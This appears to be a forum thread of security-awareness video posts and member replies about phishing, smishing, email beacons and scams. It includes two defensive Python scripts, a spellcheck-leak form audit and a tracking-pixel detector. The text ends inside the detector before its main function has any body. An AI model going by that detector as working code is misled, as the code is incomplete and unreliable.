Read the whole article by How-To Geek at: https://bit.ly/3cSDGYy (https://bit.ly/3cSDGYy)
-
Now that is interesting, a motion (not the best word) activated light for your toilet :)
-
Now that is interesting, a motion (not the best word) activated light for your toilet :)
It's only on when you're sitting and shixxxng.
-
Weekly Security News Roundup w e 9-9-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/10/16/20/c3Q6DYVO65A/preview.jpg)
https://youtu.be/xUPMP4eXCK0 (https://youtu.be/xUPMP4eXCK0)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
What Is Email Spoofing
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/10/22/08/c3Q63jVOXeS/preview.jpg)
https://youtu.be/F5kMpVhQD5Y (https://youtu.be/F5kMpVhQD5Y)
What Is Email Spoofing,
and How Can You Protect Yourself?
-
The same spoofing goes on in Text messages to your phone.
Only two days ago I got a spoofed text supposedly from the British NHS (National Health Service); this scam/spoof text plays on the Covid fear. The gist of the message says someone you have been in contact with has Covid and invites you to click on a link to get a free test kit.
This link isn't the real NHS site but purports to be from national-health-service.com; this is fake (detected on VirusTotal) and Avast would actually alert if you clicked it, as the redirected URL is on the virus definitions.
I knew it was a fake right from the start from the link, as I hadn't signed up to the track and trace system (which it is trying to emulate/look like). So I contacted my local doctor's surgery to report it, in the hope the real NHS could get it shut down.
-
@David R,
I hope you have better luck than I.
All the ones I've reported are still alive and stealing other peoples money.
-
@David R,
I hope you have better luck than I.
All the ones I've reported are still alive and stealing other peoples money.
In all honesty, the receptionist didn't appear to be overly interested. She said some others had reported it, but she didn't even write down the URL (I showed her the text on my phone). So no way to say if it is/was the same domain. When I asked if they had a computer tech/IT guy I got the distinct impression they didn't. So I'm not holding my breath.
-
@DavidR. In UK you should simply report Smishing to 7726.
-
@DavidR. In UK you should simply report Smishing to 7726.
I have little confidence in this either. As it requires that you forward the text, this would also give information on the recipient. By now you have got the message that I'm a trusting sort (NOT) ;)
EDIT: Also having visited the ofcom website it is a rather long winded process.
-
Avast News Companion
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/13/13/43/c3QII5VObHa/preview.jpg)
https://youtu.be/jefDwaGtpOY (https://youtu.be/jefDwaGtpOY)
Don’t be fooled by fake news sources. Quickly check media source bias and factual reporting on supported sites.
Available for the Avast Secure Browser and all other Chromium based Browsers.
https://platform.avast.com/innovation/news-companion (https://platform.avast.com/innovation/news-companion)
-
What Is Phishing, and How Do You Avoid It
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/13/21/22/c3QIr3VOqlv/preview.jpg)
https://youtu.be/-DHOGngwyz0 (https://youtu.be/-DHOGngwyz0)
Phishing attacks are more common than ever before, and they regularly lead to fraud,
identity theft, and corporate data breaches. But what is phishing, and how can you avoid it?
My thanks to Andrew Heinzman (https://www.reviewgeek.com/author/andrewheinzman/) for his excellent article on this topic published in Reviewgeek,
https://bit.ly/3xkFMHM (https://bit.ly/3xkFMHM) which inspired this video.
-
Weekly Security News Roundup WE 9-16-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/17/14/05/c3Qb2hVOvT5/preview.jpg)
https://youtu.be/JQqbHtVv68Q (https://youtu.be/JQqbHtVv68Q)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
L.S.
N.B. All you type into your Chromium-type browser and Edge browser (for instance via spellcheck and via GBoard on Android) could land at Google and Microsoft (yep, also your passwords and other strictly personal information could land on their servers).
Such a problem, as found by otto-js, exists for Office 365, Alibaba Cloud, Google Cloud, Amazon Web Services and LastPass. Amazon and LastPass decided to take immediate measures after being informed of that particular data hole. It is advisable for you to set spellcheck in your browser settings to false (inside the three-dots menu you find at the right-hand corner of your browser).
Yes folks. 'Extra super-smart' does not always stand for 'extra super-secure'. This posting was written inside Avast Secure Browser beta, which is being tested by yours truly.
Greets from me to ye all,
polonus
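The browser-side fix polonus gives is to switch spellcheck off; the site-side complement, which is what the affected services applied, is the `spellcheck="false"` attribute on fields whose content should never reach a spellcheck service. The audit below is an added example for this thread, not code from the post or from otto-js: it parses a form with Python's standard `html.parser` and lists sensitive fields that lack the attribute. `SAMPLE_FORM` is a constructed page fragment, not a real site, and the name hints used to classify a field as sensitive are this example's own choice.

```python
"""Audit a form for sensitive fields that enhanced spellcheck could transmit.

Added example for this thread, not code from the post or from otto-js. The
browser-side fix in the post is to turn spellcheck off; the site-side
complement is the spellcheck="false" attribute, which this check looks for.
SAMPLE_FORM is a constructed page fragment, not a real site.
"""
from html.parser import HTMLParser
from typing import Dict, List

# Field types and name fragments this audit treats as sensitive (our choice).
SENSITIVE_TYPES = {"password"}
SENSITIVE_NAME_HINTS = ("ssn", "passport", "card", "iban", "secret", "dob")

SAMPLE_FORM = """
<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="password" name="otp" spellcheck="false">
  <input type="text" name="card_number">
  <textarea name="comments"></textarea>
</form>
"""


class FieldCollector(HTMLParser):
    """Collect the attributes of every <input> and <textarea> in the document."""

    def __init__(self) -> None:
        super().__init__()
        self.fields: List[Dict[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag in ("input", "textarea"):
            # A bare attribute (e.g. <input required>) arrives with value None.
            field = {name.lower(): (value or "") for name, value in attrs}
            field["_tag"] = tag
            self.fields.append(field)


def is_sensitive(field: Dict[str, str]) -> bool:
    """Password fields, plus text fields whose name hints at personal data."""
    if field.get("type", "").lower() in SENSITIVE_TYPES:
        return True
    name = field.get("name", "").lower()
    return any(hint in name for hint in SENSITIVE_NAME_HINTS)


def fields_without_spellcheck_off(html: str) -> List[str]:
    """Names of sensitive fields that do not carry spellcheck="false".

    A password field is included even though it is masked by default: a
    "show password" toggle switches it to a text field, and that is the
    moment its content becomes eligible for spellchecking.
    """
    collector = FieldCollector()
    collector.feed(html)
    return [f.get("name", "(unnamed)") for f in collector.fields
            if is_sensitive(f) and f.get("spellcheck", "").lower() != "false"]


if __name__ == "__main__":
    for name in fields_without_spellcheck_off(SAMPLE_FORM):
        print(f'field "{name}" needs spellcheck="false"')
```

On the sample it reports `password` and `card_number` and accepts `otp`, which already carries the attribute. Run against your own templates it is a quick way to confirm the fix landed on every field that matters, not just the login box.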
-
Has Your Medical Device Been Hacked
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/20/11/50/c3QYXKVOA0p/preview.jpg)
https://youtu.be/5pIA_tKRJg0 (https://youtu.be/5pIA_tKRJg0)
Roughly a third of all connected devices have insecure defaults,
such as no or weak password protection or poor software design,
that make them ripe for exploits.
My thanks to David Strom, ( https://blog.avast.com/author/david-strom (https://blog.avast.com/author/david-strom) )
for his excellent article on this topic. You can read the whole article here:
https://blog.avast.com/hacked-medical-devices (https://blog.avast.com/hacked-medical-devices)
-
Is free Wi-Fi safe?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/21/19/38/c3QrqBVOCrx/preview.jpg)
https://youtu.be/W8ygs0hDtz8 (https://youtu.be/W8ygs0hDtz8)
You need to know this before you hook into that free Wi-Fi
and get more than you bargained for.
My thanks to Emma McGowan for her article which inspired this video.
You’ll find her article at the link listed: https://blog.avast.com/is-free-wi-fi-really-safe-avast (https://blog.avast.com/is-free-wi-fi-really-safe-avast)
Avast One Essential - https://www.avast.com/en-us/index-t2#pc (https://www.avast.com/en-us/index-t2#pc)
-
One Attacker - Two Victims
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/22/21/35/c3Q3raVOmVd/preview.jpg)
https://youtu.be/nMBoPFLX7E8 (https://youtu.be/nMBoPFLX7E8)
The Lapsus$ gang seems to be behind both Uber and Rockstar Games breaches.
Both hacks show that social engineering works, and threat actors don't even go
through too much trouble using automated attack tools.
This video was inspired by an article in Cybernews: https://bit.ly/3UtkOR0 (https://bit.ly/3UtkOR0)
-
Weekly Security News Roundup w/e 9-23-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/23/19/54/c3Q0qLVOJRD/preview.jpg)
https://youtu.be/aHF-Fxl19MU (https://youtu.be/aHF-Fxl19MU)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Netiquette: Is it OK to share pictures of someone else's kids online?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/24/15/57/c3QZoPVOK6F/preview.jpg)
https://youtu.be/Y_OstT4vunA (https://youtu.be/Y_OstT4vunA)
Here’s a question a concerned parent asked Avast:
“Dear Avast, I recently hosted a birthday party for my child.
I want to post the photos on social media, but I'm not sure if it's OK
to post pictures of my kid's friends online. What should I do?”
Avast was happy to share the correct Netiquette that should be used
any time you share someone else’s photo online. This is especially important
when the photo is of a minor child.
You can read the whole article on this topic by Emma McGowan
on the Avast Blog: https://bit.ly/3xQi8mO (https://bit.ly/3xQi8mO)
-
What is social engineering
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/26/12/49/c3QOldVOM80/preview.jpg)
https://youtu.be/y95TU8QKtjY (https://youtu.be/y95TU8QKtjY)
Knowing how it works can help prevent you from becoming a victim.
My thanks to Emma McGowan for her article on this topic.
https://blog.avast.com/scammers-pose-friend (https://blog.avast.com/scammers-pose-friend)
-
Spotify - Unauthorized install on Windows 10 and 11
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/29/20/09/c3QUYQVtfnV/preview.jpg)
https://youtu.be/WgF1Kmfcjz0 (https://youtu.be/WgF1Kmfcjz0)
On 9-22-2022 Spotify was installed on my Windows 11 system without my knowledge or consent.
According to an article in Windows Latest, I wasn't alone. - https://bit.ly/3y3OeLN (https://bit.ly/3y3OeLN)
Check your system to make sure this didn't happen to you. Let me know if it did.
-
Spotify - Unauthorized install on Windows 10 and 11
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/29/20/09/c3QUYQVtfnV/preview.jpg)
https://youtu.be/WgF1Kmfcjz0 (https://youtu.be/WgF1Kmfcjz0)
On 9-22-2022 Spotify was installed on my Windows 11 system without my knowledge or consent.
According to an article in Windows Latest, I wasn't alone. - https://bit.ly/3y3OeLN (https://bit.ly/3y3OeLN)
Check your system to make sure this didn't happen to you. Let me know if it did.
Interesting:
I never had any intention of creating a Microsoft Account, only a local account that I have to use a user name and password.
So I checked out Programs and Features on my Win10 laptop and lo and behold I now have 'Microsoft Store' App dated 25/09/2022 - looks like that was installed. Worse still I can't uninstall it/them. I also got bloody Microsoft Edge dated 27/09/2022. I also noticed other MS cr4p installed 11/08/2022, Microsoft Photos.
Fortunately no Spotify (so far).
-
Uninstalling the Microsoft Store app is not supported,
and uninstalling it may cause unintended consequences.
There is no supported workaround to uninstall or reinstall Microsoft Store.
Sorry, some things are difficult, others are impossible.
-
Weekly Security News Roundup w/e 9-30-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/02/22/43/c36n35Vt64F/preview.jpg)
https://youtu.be/gbQcbP5aGBY
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Ransomware gang leaks data stolen from LAUSD school system
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/04/12/57/c36flPVtDjm/preview.jpg)
https://youtu.be/Cjuy7fWV-TE (https://youtu.be/Cjuy7fWV-TE)
Data of Students and Faculty stolen in a recent data breach has been released to the Dark Web.
Affected persons can call the hotline set up at 855-926-1129.
-
BeReal – Not Really
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/07/21/16/c36irDVttPZ/preview.jpg)
https://youtu.be/vFr3vMahIBM (https://youtu.be/vFr3vMahIBM)
The social network’s aim is to allow people to share unfiltered moments of their lives.
The potential danger comes when those unfiltered moments include information they’d rather not share.
My thanks to Emma McGowan for her excellent article on this topic which prompted this video.
Read her article at https://blog.avast.com/bereal-safety (https://blog.avast.com/bereal-safety)
-
Weekly Security News Roundup w/e 10-7-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/07/23/19/c36i0qVtu1e/preview.jpg)
https://youtu.be/LbCLcO-XUmk (https://youtu.be/LbCLcO-XUmk)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
The IRS warns smishing attacks are on the rise
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/15/11/21/c36oXrVtJNy/preview.jpg)
https://youtu.be/qCNOvWVAPl4 (https://youtu.be/qCNOvWVAPl4)
The IRS said the attacks have increased exponentially, especially texts that appear to be coming
from the taxing agency.
My thanks go to David Strom for his excellent article, which inspired this video.
To read the article just follow the link: https://blog.avast.com/irs-smishing-attacks (https://blog.avast.com/irs-smishing-attacks)
-
Weekly Security News Roundup w/e 10-14-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/15/14/08/c36o2jVtdVj/preview.jpg)
https://youtu.be/l39Klvtk2l8 (https://youtu.be/l39Klvtk2l8)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
-
Cryptojacking is back in the news – and it’s increasing
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/16/17/30/c36DbvVtKv1/preview.jpg)
https://youtu.be/rk-pCEMM5GM (https://youtu.be/rk-pCEMM5GM)
Cryptojacking attacks are once again in the news and back in favor with online attackers.
This form of attack uses malware to insert specialized and hidden “mining” apps to create new coins for the attackers.
David Strom’s excellent article available here, https://bit.ly/3EIfMdW (https://bit.ly/3EIfMdW) inspired this video.
-
Car Insurance Tracking Devices - Good or Bad?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/18/20/46/c36FYmVtPLL/preview.jpg)
https://youtu.be/hzmeYlezFmw (https://youtu.be/hzmeYlezFmw)
These days, car insurance tracking devices are available from most insurance companies,
but what are they, and how do they work? Will you be comfortable sharing all the information collected?
My thanks to Cory Gunther whose article inspired this video.
You’ll find the article at the link listed here: https://bit.ly/3S9vstS (https://bit.ly/3S9vstS)
-
Weekly Security News Roundup w/e 10-21-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/21/12/41/c36rlpVuhev/preview.jpg)
https://youtu.be/6oj_PD6nJXo (https://youtu.be/6oj_PD6nJXo)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
What happens to your Facebook account when you pass away?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/25/19/54/c36TqLVuoCS/preview.jpg)
https://youtu.be/Lzo1OuCqQYs (https://youtu.be/Lzo1OuCqQYs)
What will happen with all that data when we pass away?
Discussing your digital legacy isn't pleasant, but it’s an important part of our reality.
Don't leave it up to your family members, friends, or even worse: Facebook itself.
My thanks to Julia Szymanska for her excellent article on the topic,
which was the inspiration for this video. You’ll find her article here: https://bit.ly/3FgIR0i (https://bit.ly/3FgIR0i)
-
Weekly Security News Roundup w/e 10-28-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/28/15/26/c36uoOVuT1l/preview.jpg)
https://youtu.be/bYDoeIYslPw (https://youtu.be/bYDoeIYslPw)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Phishing: The tip of the iceberg
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/29/16/02/c36UDnVute7/preview.jpg)
https://youtu.be/qB09AreoUJ8 (https://youtu.be/qB09AreoUJ8)
From big companies to individuals, phishing affects everyone in today's digital world.
My thanks to Luis Corrons for his article on this topic and the information for this video.
https://blog.avast.com/phishing-tip-iceberg (https://blog.avast.com/phishing-tip-iceberg)
-
What to do if you've been hacked
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/03/19/43/c3Xeq5VupdT/preview.jpg)
https://youtu.be/WQgLaOU5h_g (https://youtu.be/WQgLaOU5h_g)
It can feel embarrassing to be the victim of a crime but, remember: You’re not alone.
Nowadays it’s a very common occurrence.
My thanks to Emma McGowan for her information on this topic and the inspiration for this video.
Follow the link to read her article. https://blog.avast.com/emergency-plan-what-to-do-hacked (https://blog.avast.com/emergency-plan-what-to-do-hacked)
You can reach the FTC to report a crime at the following link:
https://www.justice.gov/criminal-fraud/report-fraud (https://www.justice.gov/criminal-fraud/report-fraud)
-
Avast - Energy Scams Are Increasing
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/04/13/39/c3XfIgVuEnF/preview.jpg)
https://youtu.be/uGu5flWKuzo (https://youtu.be/uGu5flWKuzo)
A message from Avast (https://www.avast.com/en-us/index#pc) about the current energy price hikes and the associated increase
in scams around this topic.
-
Weekly Security News Roundup w/e 11-4-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/05/22/19/c3Xh3qVum5E/preview.jpg)
https://youtu.be/OWsgaT0lgeY (https://youtu.be/OWsgaT0lgeY)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Some 15,000 WordPress websites have malicious code to redirect visitors:
Re: https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html
Also the problem of Hostwinds ignoring abuse.
polonus
-
Weekly Security News Roundup w/e 11-11-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/12/16/00/c3XlDcVUeW3/preview.jpg)
https://youtu.be/xia8-Yc_o9Y (https://youtu.be/xia8-Yc_o9Y)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Someone is spying on you
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/23/13/08/c3X0IjVU4IT/preview.jpg)
https://youtu.be/t-qr0FyECJY (https://youtu.be/t-qr0FyECJY)
Someone is almost certainly spying on you.
My thanks go to Emma McGowan for her article and the inspiration for this video.
Follow the link to read it: https://blog.avast.com/someone-is-spying-on-you-avast (https://blog.avast.com/someone-is-spying-on-you-avast)
-
Weekly Security News Roundup w/e 11-25-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/26/14/55/c3XO2NVUp2u/preview.jpg)
https://youtu.be/CoVUjOG9Z_A (https://youtu.be/CoVUjOG9Z_A)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup w/e 12-2-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/02/19/43/c3lnq5VUSqh/preview.jpg)
https://youtu.be/V97xyAII_sk (https://youtu.be/V97xyAII_sk)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
This may look nice. It may be tempting, but it's just another phishing email
that made it past the Gmail spam filter.
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/04/18/45/c3lfFGVvcSV/preview.jpg)
-
Order Scams are Increasing for the Holiday Season
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/05/22/23/c3lh30Vvfsr/preview.jpg)
https://youtu.be/6POP4n6ms_8 (https://youtu.be/6POP4n6ms_8)
Some timely advice from Avast about the fake order scams that are rampant
during the holiday season. https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
-
Holiday Season - Scam Season
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/08/19/52/c3ljqsVvoic/preview.jpg)
https://youtu.be/BgXZMQvcTfU (https://youtu.be/BgXZMQvcTfU)
Here are 9 online scams to watch out for this holiday season.
My thanks to Emma McGowan for her article on this topic
and the inspiration for this video. You'll find her article here:
https://blog.avast.com/online-holiday-scams (https://blog.avast.com/online-holiday-scams)
-
3 Major Cybersecurity Predictions for 2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/09/22/46/c3lQ3mVvFKV/preview.jpg)
https://youtu.be/GcG6baCh4GM (https://youtu.be/GcG6baCh4GM)
This year, Avast has three major predictions for 2023.
My thanks to Emma McGowan for her article on this topic which was the inspiration for this video.
You’ll find her article on the Avast blog at: https://blog.avast.com/2023-predictions (https://blog.avast.com/2023-predictions)
-
Weekly Security News Roundup w/e 12-9-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/10/17/34/c3l6b4Vvq7x/preview.jpg)
https://youtu.be/LMKfyndeapQ (https://youtu.be/LMKfyndeapQ)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Hey Google - This needs fixing
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/11/15/54/c3lXoLVvrjZ/preview.jpg)
This one was sent from the following email address:
from: Thank-You** <-PAWTXGNZFLBOL@housedump.best
All the emails have the same theme. You are always a Winner of some kind.
If you react to any of the links that are part of this email,
they are the winner and you lose.
There have been SPAM and PHISHING campaigns in the past that managed to
get past the spam filter in Gmail, but this campaign seems to have stumped GOOGLE;
it's been going on far too long.
-
I think we all need to be more wary of such emails.
For more years than I can remember I have been using MailWasher (and eventually MailWasher Pro, the paid version). It pre-filters the email service(s) you use. It doesn't download whole emails, just a part of each (leaving it on the mail server), and it looks for spam/scams. It is also very highly configurable and the partial email can be viewed by the user in plain text (within the MailWasher program), with no images calling home or beacons to confirm receipt, etc.
You can examine the headers and email content, flag it as spam or to add to blacklist or to bounce. Once done it deletes any emails flagged as spam from the email server and calls your email client. You then download only the email you wanted.
Whilst it is a paid program, I bought a lifetime license many years ago (great deal I couldn't turn down) and it has served me well over the years.
-
Just to clarify, the email I've received has been marked as spam.
So have all the others that are very similar in appearance but,
new email addresses are used and new ISPs are used and the spam continues
as it would even if I were to use a third party spam blocker.
-
Amazon launches another controversial ad feature
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/12/20/50/c3llYKVvTFF/preview.jpg)
https://youtu.be/kFkNFQygYCs (https://youtu.be/kFkNFQygYCs)
This video explains a new ads feature offered by Amazon that may raise
unacceptable privacy concerns.
This video is based on information obtained from an article at ghacks.net.
Read it here: https://bit.ly/3W5D56S (https://bit.ly/3W5D56S)
-
Phishing - Vishing - Smishing
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/14/21/16/c3l2rDVvxlR/preview.jpg)
https://youtu.be/P3ye21crXfo (https://youtu.be/P3ye21crXfo)
Knowing the differences between these terms can help you stay safe online.
Avast Software provided the definitions. https://www.avast.com/ (https://www.avast.com/)
-
Don’t Fall for These Common Holiday Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/15/23/00/c3lo0cVvamG/preview.jpg)
https://youtu.be/fl6a3jlS8CY (https://youtu.be/fl6a3jlS8CY)
The holiday season is here, whether you’re happy about it or are a grinch.
It’s a time to shop, enjoy the festivities, and spend time with family,
but make sure you avoid all the holiday fraud. Unfortunately, every year,
thousands of people fall victim to scams.
My thanks to Cory Gunther for his excellent article on this topic.
Please read his article here: https://bit.ly/3PsKpHy (https://bit.ly/3PsKpHy)
-
Weekly Security News Roundup w/e 12-16-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/16/15/03/c3lDoeVvApB/preview.jpg)
https://youtu.be/Lu2hnthL6iM (https://youtu.be/Lu2hnthL6iM)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Every new tech toy can be a potential privacy and security concern
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/19/20/40/c3lqYkVv5qX/preview.jpg)
https://youtu.be/1ijSuksGKbI (https://youtu.be/1ijSuksGKbI)
Let’s take a look at some of this year's hottest tech gadgets and the potential privacy risks
that come with each.
My thanks to Emma McGowan for this info and the inspiration for the video.
You can read her article here: https://bit.ly/3HND3wG (https://bit.ly/3HND3wG)
-
Weekly Security News Roundup w/e 12-23-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/23/14/57/c3l02PVvMrI/preview.jpg)
https://youtu.be/slL3bNlvBo8 (https://youtu.be/slL3bNlvBo8)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
WordPress websites being attacked through the YITH WooCommerce Gift Cards plug-in.
Vulnerable through a flaw known as CVE-2022-45359. As many as 56,567 websites with that particular plug-in could be vulnerable.
Update as soon as possible to version 3.20.0 -> https://yithemes.com/themes/plugins/yith-woocommerce-gift-cards/
polonus
-
Caution with this "Expiring Soon" email.
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/29/13/44/c3lUIEVvWHg/preview.jpg)
You'll be a LOSER as soon as you click anywhere on or in that email.
It's a Phishing Scam. Report it as Spam.
This same type of email spam has been arriving in your Gmail folder
for quite some time. Google still hasn't figured out how to block it.
Be careful and never click on something that promises to deliver anything
for FREE. There is no free lunch. Stay safe.
-
You'll be a LOSER as soon as you click anywhere on or in that email.
It's a Phishing Scam. Report it as Spam.
The problem with this is that, even if you don't reply, the chances are you have already lost.
Many such emails, in order to display images, phone home to fetch the image and basically confirm receipt of the email. In the old days this was known as a web beacon/tracker, and you may not even see an image as it can be as small as 1 pixel.
This is one of the reasons I run MailWasher Pro to pre-vet my emails: it downloads a small part of the email, which is displayed in plain text, you can view the code behind the content, and it pre-vets against a number of spam/scam resources. At this point I can flag/mark it for deletion from the server or ban the sender, etc.
Once MailWasher does that, it then calls your email program to download the remainder of your emails.
-
You'll be a LOSER as soon as you click anywhere on or in that email.
It's a Phishing Scam. Report it as Spam.
The problem with this is that, even if you don't reply, the chances are you have already lost.
Many such emails, in order to display images, phone home to fetch the image and basically confirm receipt of the email. In the old days this was known as a web beacon/tracker, and you may not even see an image as it can be as small as 1 pixel.
This is one of the reasons I run MailWasher Pro to pre-vet my emails: it downloads a small part of the email, which is displayed in plain text, you can view the code behind the content, and it pre-vets against a number of spam/scam resources. At this point I can flag/mark it for deletion from the server or ban the sender, etc.
Once MailWasher does that, it then calls your email program to download the remainder of your emails.
Please note, my email is strictly online. There is no email server to contact and remove the item.
This item normally would also not have been opened but directly marked as spam and added to the blocked listing.
-
You'll be a LOSER as soon as you click anywhere on or in that email.
It's a Phishing Scam. Report it as Spam.
The problem with this is that, even if you don't reply, the chances are you have already lost.
Many such emails, in order to display images, phone home to fetch the image and basically confirm receipt of the email. In the old days this was known as a web beacon/tracker, and you may not even see an image as it can be as small as 1 pixel.
<snip>
Please note, my email is strictly online. There is no email server to contact and remove the item.
This item normally would also not have been opened but directly marked as spam and added to the blocked listing.
Not necessarily just for you, Bob, but to let others know the danger: just receiving and viewing emails can be calling home.
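The web beacon behaviour described in the posts above (a remote image, often 1x1 and hidden, whose URL carries a per-recipient token so that fetching it confirms the address is live) can be spotted before any image is loaded. The script below is an added example, not code from any poster or from MailWasher: it parses a constructed sample email (not a real message; the example.test hostnames and the rid/cid parameters are assumptions) with the Python standard library, lists every remote image in the HTML body and flags the ones that look like beacons.

```python
"""Flag likely tracking pixels (web beacons) in an HTML email without fetching anything."""
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed sample message (not a real email). It carries a visible logo and,
# after it, a hidden 1x1 image whose query string holds an opaque recipient token.
SAMPLE_EMAIL = """\
From: Prize Desk <noreply@example.test>
To: victim@example.test
Subject: You are a Winner
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Congratulations! Claim your reward.</p>
<img src="https://cdn.example.test/logo.png" width="200" height="60">
<img src="https://track.example.test/open?rid=9f3c2a7e1b&cid=42" width="1" height="1" style="display:none">
<a href="https://track.example.test/click?rid=9f3c2a7e1b">Claim now</a>
</body></html>
"""


class _ImgCollector(HTMLParser):
    """Collects the attributes of every <img> tag in an HTML document."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            self.images.append(dict(attrs))


def _html_body(raw_email: str) -> str:
    """Return the decoded text/html part of a raw RFC 822 message, or '' if none."""
    msg = message_from_string(raw_email)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            return part.get_payload(decode=True).decode(charset, errors="replace")
    return ""


def _is_tiny(attrs: dict) -> bool:
    """True when width or height is declared as 1px or less (classic beacon size)."""

    def dim(value):
        try:
            return float(str(value).strip().lower().rstrip("px"))
        except ValueError:
            return None

    width, height = dim(attrs.get("width", "")), dim(attrs.get("height", ""))
    return (width is not None and width <= 1) or (height is not None and height <= 1)


def find_beacons(raw_email: str) -> list:
    """Return one finding per remote image; 'suspicious' is set when it looks like a beacon.

    A remote image always reveals that the message was opened; the extra reasons
    (tiny size, CSS hiding, opaque token) are what distinguish a beacon from a logo.
    """
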